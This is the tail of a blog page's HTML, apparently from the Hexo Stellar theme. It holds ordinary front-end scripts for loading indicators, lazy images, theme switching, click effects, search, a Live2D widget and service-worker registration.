        $(el).append('<div class="loading-wrap"><svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" stroke-opacity=".3" d="M12 3C16.9706 3 21 7.02944 21 12C21 16.9706 16.9706 21 12 21C7.02944 21 3 16.9706 3 12C3 7.02944 7.02944 3 12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="1.3s" values="60;0"/></path><path stroke-dasharray="15" stroke-dashoffset="15" d="M12 3C16.9706 3 21 7.02944 21 12"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.3s" values="15;0"/><animateTransform attributeName="transform" dur="1.5s" repeatCount="indefinite" type="rotate" values="0 12 12;360 12 12"/></path></g></svg></div>');
      }
    },
    onLoadSuccess: (el) => {
      if (el) {
        $(el).find('.loading-wrap').remove();
      }
    },
    onLoadFailure: (el) => {
      if (el) {
        $(el).find('.loading-wrap svg').remove();
        $(el).find('.loading-wrap').append('<svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" d="M12 3L21 20H3L12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.5s" values="60;0"/></path><path stroke-dasharray="6" stroke-dashoffset="6" d="M12 10V14"><animate fill="freeze" attributeName="stroke-dashoffset" begin="0.6s" dur="0.2s" values="6;0"/></path></g><circle cx="12" cy="17" r="1" fill="currentColor" fill-opacity="0"><animate fill="freeze" attributeName="fill-opacity" begin="0.8s" dur="0.4s" values="0;1"/></circle></svg>');
        $(el).find('.loading-wrap').addClass('error');
      }
    },
    request: (el, url, callback, onFailure) => {
      const maxRetry = 3;
      let retryCount = 0;

      return new Promise((resolve, reject) => {
        const load = () => {
          utils.onLoading?.(el);

          let timedOut = false;
          const timeout = setTimeout(() => {
            timedOut = true;
            console.warn('[request] 超时:', url);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject('请求超时');
            } else {
              setTimeout(load, 1000);
            }
          }, 5000);

          fetch(url).then(resp => {
            if (timedOut) return;
            clearTimeout(timeout);

            if (!resp.ok) throw new Error('响应失败');
            return resp;
          }).then(data => {
            if (timedOut) return;
            utils.onLoadSuccess?.(el);
            callback(data);
            resolve(data);
          }).catch(err => {
            clearTimeout(timeout);
            console.warn('[request] 错误:', err);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject(err);
            } else {
              setTimeout(load, 1000);
            }
          });
        };

        load();
      });
    },
    requestWithoutLoading: (url, options = {}, maxRetry = 2, timeout = 5000) => {
      return new Promise((resolve, reject) => {
        let retryCount = 0;

        const tryRequest = () => {
          let timedOut = false;
          const timer = setTimeout(() => {
            timedOut = true;
            if (++retryCount > maxRetry) reject('timeout');
            else tryRequest();
          }, timeout);

          fetch(url, options)
            .then(resp => {
              clearTimeout(timer);
              if (!resp.ok) throw new Error('bad response');
              resolve(resp);
            })
            .catch(err => {
              clearTimeout(timer);
              if (++retryCount > maxRetry) reject(err);
              else setTimeout(tryRequest, 500);
            });
        };

        tryRequest();
      });
    },
    /********************** requestAnimationFrame ********************************/
    // 1、requestAnimationFrame 会把每一帧中的所有 DOM 操作集中起来，在一次重绘或回流中就完成，并且重绘或回流的时间间隔紧紧跟随浏览器的刷新频率，一般来说，这个频率为每秒60帧。
    // 2、在隐藏或不可见的元素中，requestAnimationFrame 将不会进行重绘或回流，这当然就意味着更少的的 cpu，gpu 和内存使用量。
    requestAnimationFrame: (fn) => {
      if (!window.requestAnimationFrame) {
        window.requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame || window.webkitRequestAnimationFrame;
      }
      window.requestAnimationFrame(fn)
    },
    dark: {},
  };

  // utils.dark.mode 当前模式 dark or light
  // utils.dark.toggle() 暗黑模式触发器
  // utils.dark.push(callBack[,"callBackName"]) 传入触发器回调函数
  utils.dark.method = {
    toggle: new RunItem(),
  };
  utils.dark = Object.assign(utils.dark, {
    push: utils.dark.method.toggle.push,
  });
</script>
<script>
  const sidebar = {
    leftbar: () => {
      if (l_body) {
        l_body.toggleAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    rightbar: () => {
      if (l_body) {
        l_body.toggleAttribute('rightbar');
        l_body.removeAttribute('leftbar');
      }
    },
    dismiss: () => {
      if (l_body) {
        l_body.removeAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    toggleTOC: () => {
      document.querySelector('#data-toc').classList.toggle('collapse');
    }
  }
</script>
<script type="text/javascript">
  (() => {
    const tagSwitchers = document.querySelectorAll('.tag-subtree.parent-tag > a > .tag-switcher-wrapper')
    for (const tagSwitcher of tagSwitchers) {
      tagSwitcher.addEventListener('click', (e) => {
        const parent = e.target.closest('.tag-subtree.parent-tag')
        parent.classList.toggle('expanded')
        e.preventDefault()
      })
    }

    // Get active tag from query string, then activate it.
    const urlParams = new URLSearchParams(window.location.search)
    const activeTag = urlParams.get('tag')
    if (activeTag) {
      let tag = document.querySelector(`.tag-subtree[data-tag="${activeTag}"]`)
      if (tag) {
        tag.querySelector('a').classList.add('active')
        
        while (tag) {
          tag.classList.add('expanded')
          tag = tag.parentElement.closest('.tag-subtree.parent-tag')
        }
      }
    }
  })()
</script>

<script async src="https://gcore.jsdelivr.net/npm/vanilla-lazyload@19.1/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazy",
    callback_loaded: (el) => {
      el.classList.add('loaded');
      const wrapper = el.closest('.lazy-box');
      const icon = wrapper?.querySelector('.lazy-icon');
      if (icon) icon.remove();
    }
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    window.lazyLoadInstance?.update();
  });

  window.wrapLazyloadImages = (container) => {
    if (typeof container === 'string') {
      container = document.querySelector(container);
    }
    if (!container) return;
    
    const images = container.querySelectorAll('img');
    images.forEach((img) => {
      if (img.classList.contains('lazy')) return;

      const src = img.getAttribute('src');
      if (!src) return;

      const wrapper = document.createElement('div');
      wrapper.className = 'lazy-box';

      const newImg = img.cloneNode();
      newImg.removeAttribute('src');
      newImg.setAttribute('data-src', src);
      newImg.classList.add('lazy');

      const icon = document.createElement('div');
      icon.className = 'lazy-icon';
      if (def.loading) {
        icon.style.backgroundImage = `url("${def.loading}")`;
      }

      wrapper.appendChild(newImg);
      wrapper.appendChild(icon);

      img.replaceWith(wrapper);
    });

    // 通知 LazyLoad 更新
    if (window.lazyLoadInstance?.update) {
      window.lazyLoadInstance.update();
    }
  }
  
</script>

<!-- required -->
<script src="/js/main.js?v=1.33.1" defer></script>

<script type="text/javascript">
  const applyTheme = (theme) => {
    document.documentElement.setAttribute('data-theme', theme)
  }

  const switchTheme = () => {
    const currentTheme = document.documentElement.getAttribute('data-theme')
    let newTheme;
    if (currentTheme === 'light') {
      newTheme = 'dark'
    } else {
      newTheme = 'light'
    }
    applyTheme(newTheme)
    window.localStorage.setItem('Stellar.theme', newTheme)
    
    const messages = {
      light: `切换到浅色模式`,
      dark: `切换到深色模式`,
    }
    hud?.toast?.(messages[newTheme])
  }

  (() => {
    const theme = window.localStorage.getItem('Stellar.theme')
    if (theme !== null) {
      applyTheme(theme)
    } else {
      applyTheme('dark')
    }
  })()
</script>

<!-- optional -->



<script defer>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.services = Object.assign({}, JSON.parse(`{"mdrender":{"js":"/js/services/mdrender.js"},"siteinfo":{"js":"/js/services/siteinfo.js","api":null},"ghinfo":{"js":"/js/services/ghinfo.js"},"rating":{"js":"/js/services/rating.js","api":"https://star-vote.xaox.cc/api/rating"},"vote":{"js":"/js/services/vote.js","api":"https://star-vote.xaox.cc/api/vote"},"sites":{"js":"/js/services/sites.js"},"friends":{"js":"/js/services/friends.js"},"friends_and_posts":{"js":"/js/services/friends_and_posts.js"},"timeline":{"js":"/js/services/timeline.js"},"fcircle":{"js":"/js/services/fcircle.js"},"weibo":{"js":"/js/services/weibo.js"},"memos":{"js":"/js/services/memos.js"},"voice":{"js":"/js/plugins/voice.js"},"video":{"js":"/js/plugins/video.js"},"download-file":{"js":"/js/plugins/download-file.js"},"twikoo":{"js":"/js/services/twikoo_latest_comment.js"},"waline":{"js":"/js/services/waline_latest_comment.js"},"artalk":{"js":"/js/services/artalk_latest_comment.js"},"giscus":{"js":"/js/services/giscus_latest_comment.js"},"contributors":{"edit_this_page":{"_posts/":null,"wiki/stellar/":"https://github.com/xaoxuu/hexo-theme-stellar-docs/blob/main/"},"js":"/js/services/contributors.js"}}`));
    for (let id of Object.keys(ctx.services)) {
      const js = ctx.services[id].js;
      if (id == 'siteinfo') {
        ctx.cardlinks = document.querySelectorAll('a.link-card[cardlink]');
        if (ctx.cardlinks?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            setCardLink(ctx.cardlinks);
          });
        }
      } else if (id == 'voice') {
        ctx.voiceAudios = document.querySelectorAll('.voice>audio');
        if (ctx.voiceAudios?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            createVoiceDom(ctx.voiceAudios);
          });
        }
      } else if (id == 'video') {
        ctx.videos = document.querySelectorAll('.video>video');
        if (ctx.videos?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            videoEvents(ctx.videos);
          });
        }
      } else if (id == 'download-file') {
        ctx.files = document.querySelectorAll('.file');
        if (ctx.files?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            downloadFileEvent(ctx.files);
          });
        }
      } else {
        const els = document.getElementsByClassName(`ds-${id}`);
        if (els?.length > 0) {
          utils.jq(() => {
            if (id == 'timeline' || 'memos' || 'marked') {
              utils.js(deps.marked).then(function () {
                utils.js(js, { defer: true });
              });
            } else {
              utils.js(js, { defer: true });
            }
          });
        }
      }
    }

    // chat iphone time
    let phoneTimes = document.querySelectorAll('.chat .status-bar .time');

    if (phoneTimes.length > 0) {
      NowTime();
      var date = new Date();
      var sec = date.getSeconds();
      var firstAdjustInterval = setInterval(firstAdjustTime, 1000 * (60 - sec));
    }

    function firstAdjustTime() {
      NowTime();
      clearInterval(firstAdjustInterval);
      setInterval(NowTime, 1000 * 60);
    }

    function NowTime() {
      for (let i = 0; i < phoneTimes.length; ++i) {
        var timeSpan = phoneTimes[i];
        var date = new Date();
        var hour = date.getHours();
        var min = date.getMinutes();
        timeSpan.innerHTML = check(hour) + ":" + check(min);
      }
    };

    function check(val) {
      if (val < 10) {
        return ("0" + val);
      }
      return (val);
    }

    // chat quote
    const chat_quote_obverser = new IntersectionObserver((entries, observer) => {
      entries.filter((entry) => { return entry.isIntersecting }).sort((a, b) => a.intersectionRect.y !== b.intersectionRect.y ? a.intersectionRect.y - b.intersectionRect.y : a.intersectionRect.x - b.intersectionRect.x).forEach((entry, index) => {
          observer.unobserve(entry.target);
          setTimeout(() => {
            entry.target.classList.add('quote-blink');
            setTimeout(() => {
              entry.target.classList.remove('quote-blink');
            }, 1000);
          }, Math.max(100, 16) * (index + 1));
        });
    });

    var chatQuotes = document.querySelectorAll(".chat .talk .quote");
    chatQuotes.forEach((quote) => {
      quote.addEventListener('click', function () {
        var chatCellDom = document.getElementById("quote-" + quote.getAttribute("quotedCellTag"));
        if (chatCellDom) {
          var chatDiv = chatCellDom.parentElement;
          var mid = chatDiv.clientHeight / 2;
          var offsetTop = chatCellDom.offsetTop;
          if (offsetTop > mid - chatCellDom.clientHeight / 2) {
            chatDiv.scrollTo({
              top: chatCellDom.offsetTop - mid + chatCellDom.clientHeight / 2,
              behavior: "smooth"
            });
          } else {
            chatDiv.scrollTo({
              top: 0,
              behavior: "smooth"
            });
          }
          chat_quote_obverser.observe(chatCellDom);
        }
      });
    });
  });
</script>

<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.search = {
      path: `/search.json`,
    }
    utils.js('/js/search/local-search.js', { defer: true });
  });
</script><script>
  window.FPConfig = {
    delay: 0,
    ignoreKeywords: [],
    maxRPS: 5,
    hoverDelay: 25
  };
</script>
<script defer src="https://gcore.jsdelivr.net/npm/flying-pages@2/flying-pages.min.js"></script><script>
  window.addEventListener('DOMContentLoaded', (event) => {
    const swiper_api = document.getElementById('swiper-api');
    if (swiper_api != undefined) {
      utils.css(`https://unpkg.com/swiper@10.3/swiper-bundle.min.css`);
      utils.js(`https://unpkg.com/swiper@10.3/swiper-bundle.min.js`, { defer: true }).then(function () {
        const effect = swiper_api.getAttribute('effect') || '';
        var swiper = new Swiper('.swiper#swiper-api', {
          slidesPerView: 'auto',
          spaceBetween: 8,
          centeredSlides: true,
          effect: effect,
          rewind: true,
          pagination: {
            el: '.swiper-pagination',
            clickable: true,
          },
          navigation: {
            nextEl: '.swiper-button-next',
            prevEl: '.swiper-button-prev',
          },
        });
      })
    }
  });
</script>
<script>
  document.addEventListener('DOMContentLoaded', function () {
    window.codeElements = document.querySelectorAll('.code');
    if (window.codeElements.length > 0) {
      ctx.copycode = {
        default_text: `Copy`,
        success_text: `Copied`,
        toast: `复制成功`,
      };
      utils.js('/js/plugins/copycode.js');
    }
  });
</script>


<!-- inject -->


<!-- Custom Image Viewer -->
<script src="/js/plugins/image-viewer.js"></script>

<!-- Custom Context Menu -->
<script src="/js/plugins/custom-context-menu.js"></script>

<!-- Glitch Effect -->
<script src="/js/plugins/glitch-effect.js"></script>

<!-- Terminal Copy -->
<script src="/js/plugins/terminal-copy.js"></script>

<!-- Hotkeys -->
<script src="/js/plugins/hotkeys.js"></script>

<!-- Achievements / Card System -->
<script src="/js/plugins/achievements.js"></script>

<!-- Offline Vault - 断网保护机制 -->
<script src="/js/plugins/offline-vault.js"></script>

<!-- Live2D Widget - Local Version -->
<script src="/live2d-widget/dist/autoload.js"></script>

<!-- Live2D Widget 位置调整和默认显示 -->
<style>
  #waifu {
    position: fixed !important;
    bottom: 20px !important;
    right: 20px !important;
    left: auto !important;
    z-index: 1000 !important;
    transform: none !important;
    display: block !important;
    opacity: 1 !important;
    visibility: visible !important;
  }
  #waifu #live2d {
    position: relative !important;
    transform: none !important;
  }
  #waifu-toolbar {
    position: relative !important;
    transform: none !important;
  }
  #waifu-toggle {
    display: none !important;
  }
</style>

<!-- 点击特效 -->
<script>
(function() {
  var clickEffects = {
    current: null,
    
    init: function() {
      this.current = localStorage.getItem('clickEffect') || 'none';
      this.bindEvents();
    },
    
    bindEvents: function() {
      var self = this;
      document.addEventListener('click', function(e) {
        if (self.current === 'none') return;
        if (e.target.closest('button, a, input, textarea, select, .post-card, .layout-btn')) return;
        self.createEffect(e.clientX, e.clientY);
      });
      
      window.addEventListener('storage', function(e) {
        if (e.key === 'clickEffect') {
          self.current = e.newValue || 'none';
        }
      });
    },
    
    createEffect: function(x, y) {
      switch(this.current) {
        case 'ripple': this.createRipple(x, y); break;
        case 'firework': this.createFirework(x, y); break;
        case 'particles': this.createParticles(x, y); break;
        case 'text': this.createText(x, y); break;
        default: break;
      }
    },
    
    createRipple: function(x, y) {
      var ripple = document.createElement('div');
      ripple.className = 'click-ripple';
      ripple.style.cssText = 'position:fixed;left:' + x + 'px;top:' + y + 'px;width:0;height:0;border-radius:50%;background:rgba(52,152,219,0.4);transform:translate(-50%,-50%);pointer-events:none;z-index:9999;animation:rippleExpand 0.6s ease-out forwards;';
      document.body.appendChild(ripple);
      setTimeout(function() { ripple.remove(); }, 600);
    },
    
    createFirework: function(x, y) {
      var colors = ['#ff6b6b', '#feca57', '#48dbfb', '#ff9ff3', '#54a0ff'];
      for (var i = 0; i < 12; i++) {
        var particle = document.createElement('div');
        var angle = (Math.PI * 2 / 12) * i;
        var velocity = 50 + Math.random() * 30;
        particle.style.cssText = 'position:fixed;left:' + x + 'px;top:' + y + 'px;width:6px;height:6px;border-radius:50%;background:' + colors[i % 5] + ';pointer-events:none;z-index:9999;transform:translate(-50%,-50%);';
        document.body.appendChild(particle);
        this.animateParticle(particle, x, y, x + Math.cos(angle) * velocity, y + Math.sin(angle) * velocity, 500);
      }
    },
    
    createParticles: function(x, y) {
      var colors = ['#ff6b6b', '#feca57', '#48dbfb', '#ff9ff3', '#54a0ff', '#5f27cd'];
      for (var i = 0; i < 8; i++) {
        var particle = document.createElement('div');
        particle.innerHTML = '✨';
        particle.style.cssText = 'position:fixed;left:' + (x + (Math.random()-0.5)*30) + 'px;top:' + (y + (Math.random()-0.5)*30) + 'px;font-size:16px;pointer-events:none;z-index:9999;animation:particleFloat 0.8s ease-out forwards;';
        document.body.appendChild(particle);
        setTimeout(function(p) { return function() { p.remove(); }; }(particle), 800);
      }
    },
    
    createText: function(x, y) {
      var texts = ['666', '厉害', 'nice', '棒', '赞', '给力'];
      var text = document.createElement('div');
      text.innerHTML = texts[Math.floor(Math.random() * texts.length)];
      text.style.cssText = 'position:fixed;left:' + x + 'px;top:' + y + 'px;font-size:18px;font-weight:bold;color:#3498db;pointer-events:none;z-index:9999;transform:translate(-50%,-50%);animation:textFloat 0.8s ease-out forwards;';
      document.body.appendChild(text);
      setTimeout(function() { text.remove(); }, 800);
    },
    
    animateParticle: function(el, startX, startY, endX, endY, duration) {
      var startTime = performance.now();
      function animate(currentTime) {
        var progress = Math.min((currentTime - startTime) / duration, 1);
        var easeOut = 1 - Math.pow(1 - progress, 3);
        el.style.left = (startX + (endX - startX) * easeOut) + 'px';
        el.style.top = (startY + (endY - startY) * easeOut) + 'px';
        el.style.opacity = 1 - progress;
        if (progress < 1) requestAnimationFrame(animate);
        else el.remove();
      }
      requestAnimationFrame(animate);
    }
  };
  
  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', function() { clickEffects.init(); });
  } else {
    clickEffects.init();
  }
  
  window.ClickEffects = clickEffects;
})();
</script>

<style>
@keyframes rippleExpand {
  0% { width: 0; height: 0; opacity: 1; }
  100% { width: 100px; height: 100px; opacity: 0; }
}
@keyframes particleFloat {
  0% { opacity: 1; transform: translateY(0) scale(1); }
  100% { opacity: 0; transform: translateY(-40px) scale(0.5); }
}
@keyframes textFloat {
  0% { opacity: 1; transform: translate(-50%, -50%) scale(1); }
  100% { opacity: 0; transform: translate(-50%, -80px) scale(1.2); }
}
</style>

<!-- PWA Service Worker -->
<script>
if ('serviceWorker' in navigator) {
  navigator.serviceWorker.register('/sw.js').then(function(reg) {
    console.log('Service Worker 已注册，支持离线访问');
  }).catch(function(err) {
    console.log('Service Worker 注册失败:', err);
  });
}
</script>

</div></body></html>
